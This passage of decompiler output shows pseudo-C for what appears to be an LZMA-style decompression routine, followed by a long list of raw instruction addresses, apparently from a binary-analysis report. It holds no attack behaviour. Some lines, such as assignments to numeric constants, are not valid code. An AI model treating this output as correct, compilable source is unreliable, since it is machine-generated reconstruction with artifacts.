											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                            0x00000000
                                                                            0x00406f5b
                                                                            0x00406f5b
                                                                            0x00406f5f
                                                                            0x00406f84
                                                                            0x00406f8e
                                                                            0x00000000
                                                                            0x00406f61
                                                                            0x00406f61
                                                                            0x00406f64
                                                                            0x00406f68
                                                                            0x00406f6b
                                                                            0x00406f6e
                                                                            0x00406f72
                                                                            0x00406f72
                                                                            0x00406f75
                                                                            0x0040704f
                                                                            0x0040704f
                                                                            0x00407056
                                                                            0x00407056
                                                                            0x00407059
                                                                            0x00407060
                                                                            0x0040708d
                                                                            0x00407091
                                                                            0x004070f1
                                                                            0x004070f4
                                                                            0x004070f9
                                                                            0x004070fa
                                                                            0x004070fc
                                                                            0x004070fe
                                                                            0x00407101
                                                                            0x0040700d
                                                                            0x0040700d
                                                                            0x0040700d
                                                                            0x004067a9
                                                                            0x004067a9
                                                                            0x004067a9
                                                                            0x004067b2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067b8
                                                                            0x00000000
                                                                            0x004067c3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067cc
                                                                            0x004067cf
                                                                            0x004067d2
                                                                            0x004067d6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004067dc
                                                                            0x004067df
                                                                            0x004067e1
                                                                            0x004067e2
                                                                            0x004067e5
                                                                            0x004067e7
                                                                            0x004067e8
                                                                            0x004067ea
                                                                            0x004067ed
                                                                            0x004067f2
                                                                            0x004067f7
                                                                            0x00406800
                                                                            0x00406813
                                                                            0x00406816
                                                                            0x00406822
                                                                            0x0040684a
                                                                            0x0040684c
                                                                            0x0040685a
                                                                            0x0040685a
                                                                            0x0040685e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040684e
                                                                            0x0040684e
                                                                            0x00406851
                                                                            0x00406852
                                                                            0x00406852
                                                                            0x00000000
                                                                            0x0040684e
                                                                            0x00406828
                                                                            0x0040682d
                                                                            0x0040682d
                                                                            0x00406836
                                                                            0x0040683e
                                                                            0x00406841
                                                                            0x00000000
                                                                            0x00406847
                                                                            0x00406847
                                                                            0x00000000
                                                                            0x00406847
                                                                            0x00000000
                                                                            0x00406864
                                                                            0x00406864
                                                                            0x00406868
                                                                            0x00407114
                                                                            0x00000000
                                                                            0x00407114
                                                                            0x00406871
                                                                            0x00406881
                                                                            0x00406884
                                                                            0x00406887
                                                                            0x00406887
                                                                            0x00406887
                                                                            0x0040688a
                                                                            0x0040688e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406890
                                                                            0x00406896
                                                                            0x004068c0
                                                                            0x004068c6
                                                                            0x004068cd
                                                                            0x00000000
                                                                            0x004068cd
                                                                            0x0040689c
                                                                            0x0040689f
                                                                            0x004068a4
                                                                            0x004068a4
                                                                            0x004068af
                                                                            0x004068b7
                                                                            0x004068ba
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004068ff
                                                                            0x00406905
                                                                            0x00406908
                                                                            0x00406915
                                                                            0x0040691d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004068d4
                                                                            0x004068d4
                                                                            0x004068d8
                                                                            0x00407123
                                                                            0x00000000
                                                                            0x00407123
                                                                            0x004068e4
                                                                            0x004068ef
                                                                            0x004068ef
                                                                            0x004068ef
                                                                            0x004068f2
                                                                            0x004068f5
                                                                            0x004068f8
                                                                            0x004068fd
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406f94
                                                                            0x00406f94
                                                                            0x00406f9a
                                                                            0x00406fa0
                                                                            0x00406fa6
                                                                            0x00406fc0
                                                                            0x00406fc3
                                                                            0x00406fc9
                                                                            0x00406fd4
                                                                            0x00406fd4
                                                                            0x00406fd6
                                                                            0x00406fa8
                                                                            0x00406fa8
                                                                            0x00406fb7
                                                                            0x00406fbb
                                                                            0x00406fbb
                                                                            0x00406fe0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406fe2
                                                                            0x00406fe6
                                                                            0x00407195
                                                                            0x00000000
                                                                            0x00407195
                                                                            0x00406ff2
                                                                            0x00406ff9
                                                                            0x00407001
                                                                            0x00407004
                                                                            0x00407007
                                                                            0x00407007
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406925
                                                                            0x00406927
                                                                            0x0040692a
                                                                            0x0040699b
                                                                            0x0040699e
                                                                            0x004069a1
                                                                            0x004069a8
                                                                            0x004069b2
                                                                            0x00000000
                                                                            0x004069b2
                                                                            0x0040692c
                                                                            0x00406930
                                                                            0x00406933
                                                                            0x00406935
                                                                            0x00406938
                                                                            0x0040693b
                                                                            0x0040693d
                                                                            0x00406940
                                                                            0x00406942
                                                                            0x00406947
                                                                            0x0040694a
                                                                            0x0040694d
                                                                            0x00406951
                                                                            0x00406958
                                                                            0x0040695b
                                                                            0x00406962
                                                                            0x00406966
                                                                            0x0040696e
                                                                            0x0040696e
                                                                            0x0040696e
                                                                            0x00406968
                                                                            0x00406968
                                                                            0x00406968
                                                                            0x0040695d
                                                                            0x0040695d
                                                                            0x0040695d
                                                                            0x00406972
                                                                            0x00406975
                                                                            0x00406993
                                                                            0x00406995
                                                                            0x00000000
                                                                            0x00406977
                                                                            0x00406977
                                                                            0x0040697a
                                                                            0x0040697d
                                                                            0x00406980
                                                                            0x00406982
                                                                            0x00406982
                                                                            0x00406982
                                                                            0x00406985
                                                                            0x00406988
                                                                            0x0040698a
                                                                            0x0040698b
                                                                            0x0040698e
                                                                            0x00000000
                                                                            0x0040698e
                                                                            0x00000000
                                                                            0x00406bc4
                                                                            0x00406bc8
                                                                            0x00406be6
                                                                            0x00406be9
                                                                            0x00406bf0
                                                                            0x00406bf3
                                                                            0x00406bf6
                                                                            0x00406bf9
                                                                            0x00406bfc
                                                                            0x00406bff
                                                                            0x00406c01
                                                                            0x00406c08
                                                                            0x00406c09
                                                                            0x00406c0b
                                                                            0x00406c0e
                                                                            0x00406c11
                                                                            0x00406c14
                                                                            0x00406c14
                                                                            0x00406c19
                                                                            0x00000000
                                                                            0x00406c19
                                                                            0x00406bca
                                                                            0x00406bcd
                                                                            0x00406bd0
                                                                            0x00406bda
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c2e
                                                                            0x00406c32
                                                                            0x00406c55
                                                                            0x00406c58
                                                                            0x00406c5b
                                                                            0x00406c65
                                                                            0x00406c34
                                                                            0x00406c34
                                                                            0x00406c37
                                                                            0x00406c3a
                                                                            0x00406c3d
                                                                            0x00406c4a
                                                                            0x00406c4d
                                                                            0x00406c4d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c71
                                                                            0x00406c75
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c7b
                                                                            0x00406c7f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406c85
                                                                            0x00406c87
                                                                            0x00406c8b
                                                                            0x00406c8b
                                                                            0x00406c8e
                                                                            0x00406c92
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406ce2
                                                                            0x00406ce6
                                                                            0x00406ced
                                                                            0x00406cf0
                                                                            0x00406cf3
                                                                            0x00406cfd
                                                                            0x00000000
                                                                            0x00406cfd
                                                                            0x00406ce8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d09
                                                                            0x00406d0d
                                                                            0x00406d14
                                                                            0x00406d17
                                                                            0x00406d1a
                                                                            0x00406d0f
                                                                            0x00406d0f
                                                                            0x00406d0f
                                                                            0x00406d1d
                                                                            0x00406d20
                                                                            0x00406d23
                                                                            0x00406d23
                                                                            0x00406d26
                                                                            0x00406d29
                                                                            0x00406d2c
                                                                            0x00406d2c
                                                                            0x00406d2f
                                                                            0x00406d36
                                                                            0x00406d3b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406dc9
                                                                            0x00406dc9
                                                                            0x00406dcd
                                                                            0x0040716b
                                                                            0x00000000
                                                                            0x0040716b
                                                                            0x00406dd3
                                                                            0x00406dd6
                                                                            0x00406dd9
                                                                            0x00406ddd
                                                                            0x00406de0
                                                                            0x00406de6
                                                                            0x00406de8
                                                                            0x00406de8
                                                                            0x00406de8
                                                                            0x00406deb
                                                                            0x00406dee
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004069be
                                                                            0x004069be
                                                                            0x004069c2
                                                                            0x0040712f
                                                                            0x00000000
                                                                            0x0040712f
                                                                            0x004069c8
                                                                            0x004069cb
                                                                            0x004069ce
                                                                            0x004069d2
                                                                            0x004069d5
